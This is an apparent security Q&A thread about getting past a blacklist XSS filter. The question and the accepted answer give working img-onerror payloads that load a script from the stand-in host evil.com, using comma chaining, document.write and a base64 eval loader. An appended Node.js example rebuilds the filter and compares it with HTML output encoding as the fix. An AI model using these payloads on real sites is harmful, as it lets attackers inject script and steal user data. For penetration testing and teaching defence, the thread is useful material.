How to abuse XSS with specific criteria or filters?


I have found a web app that is vulnerable to XSS, and can get some javascript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.

The filters I have detected so far are as follows:

  • </anythingyouwant> gets replaced with nothing
  • /> gets replaced with nothing
  • ; gets replaced with a space until the next >
  • 135 character limit including the method of delivery, e.g. <img src="." onerror="alert('xss')">

Injecting <img src="." onerror="alert('xss')"> works fine, however these developers are rather sceptical and wish to see a full PoC of full JavaScript code. Is it possible to run an arbitrary script at all?

I have tried:

  • <img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))"> result: too long, even with a shortened URL
  • <script src="//evil.com/myscript" /> result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag
  • <script src=//evil.com/myscript"></script> result: gets filtered, destroys rest of page as above
  • <img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)"> result: semicolons get filtered, breaks web page
  • <img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)"> result: I'm unsure if this is valid JS, but it appears in the Chrome "view page source" as intended, but does not work as wanted

I am using Chrome for testing, just in case it's relevant somehow.


There is 1 answer

likle (best answer):

The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:

<img src="." onerror="document.write('<script src=\'//evil.com/myscript\'><'+'/'+'script>')">

or your version with a , instead of a ;:

<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">

But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.
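Added example, not part of the question or of likle's answer: the blacklist filter the question describes, rebuilt from the four rules as listed (the order of the rules and the exact meaning of the "; until the next >" rule are my reading of that list), placed beside plain HTML output encoding, with the payloads quoted on the page run through both. The point for whoever maintains that web app: the blacklist only mangles the event handler, it still emits an <img onerror> tag, whereas entity-encoding the untrusted value leaves nothing the parser can treat as markup. The hasActiveMarkup helper is a constructed regression-test heuristic, not a general XSS detector.

```javascript
// Added example (not from the original post). Node.js, no dependencies.
'use strict';

// The question's blacklist, reimplemented as described. Rule 3 ("; gets replaced with
// a space until the next >") is read as: every ';' that still has a '>' somewhere
// after it becomes a space. Rule order is an assumption.
function blacklistFilter(input) {
  return input
    .replace(/<\/[^>]*>/g, '')      // rule 1: any closing tag </...> removed
    .replace(/\/>/g, '')            // rule 2: the two characters "/>" removed
    .replace(/;(?=[^>]*>)/g, ' ');  // rule 3: ';' before a later '>' becomes a space
}
const MAX_LEN = 135;                // rule 4: length limit stated in the question

// Contextual output encoding for an HTML text or quoted-attribute context: the
// characters that can open a tag, end an attribute value or start an entity are
// replaced by their entity references, so the browser only ever sees text.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(input) {
  return input.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Constructed regression-test heuristic: does the output still contain a tag, or a
// tag carrying an on*= attribute? (Attribute-looking text outside a tag is inert.)
function hasActiveMarkup(s) {
  return /<\s*[a-z]/i.test(s) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(s);
}

// The inputs quoted in the question and the answer, as string literals.
const PAYLOAD_SEMI  = `<img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">`;
const PAYLOAD_COMMA = `<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">`;
const PAYLOAD_WRITE = `<img src="." onerror="document.write('<script src=\\'//evil.com/myscript\\'><'+'/'+'script>')">`;

// Run one input through both treatments and report what survives.
function compare(payload) {
  const filtered = blacklistFilter(payload);
  const encoded = encodeForHtml(payload);
  return {
    withinLimit: payload.length <= MAX_LEN,
    filtered,
    filteredStillActive: hasActiveMarkup(filtered),
    encoded,
    encodedStillActive: hasActiveMarkup(encoded),
  };
}

for (const p of [PAYLOAD_SEMI, PAYLOAD_COMMA, PAYLOAD_WRITE]) {
  const r = compare(p);
  console.log(`input length ${p.length}, within ${MAX_LEN}: ${r.withinLimit}`);
  console.log(`  blacklist -> ${r.filtered}`);
  console.log(`  still active markup: ${r.filteredStillActive}`);
  console.log(`  encoded   -> ${r.encoded}`);
  console.log(`  still active markup: ${r.encodedStillActive}`);
}
```

Running it shows the semicolon payload turning into exactly the space-separated (and syntactically invalid) version the asker observed in the page source, while the comma and document.write variants pass the blacklist untouched; the encoded output of every input contains no "<" at all. The fix on the server side is the encoding function, applied at output time for the context the value lands in, not a longer blacklist.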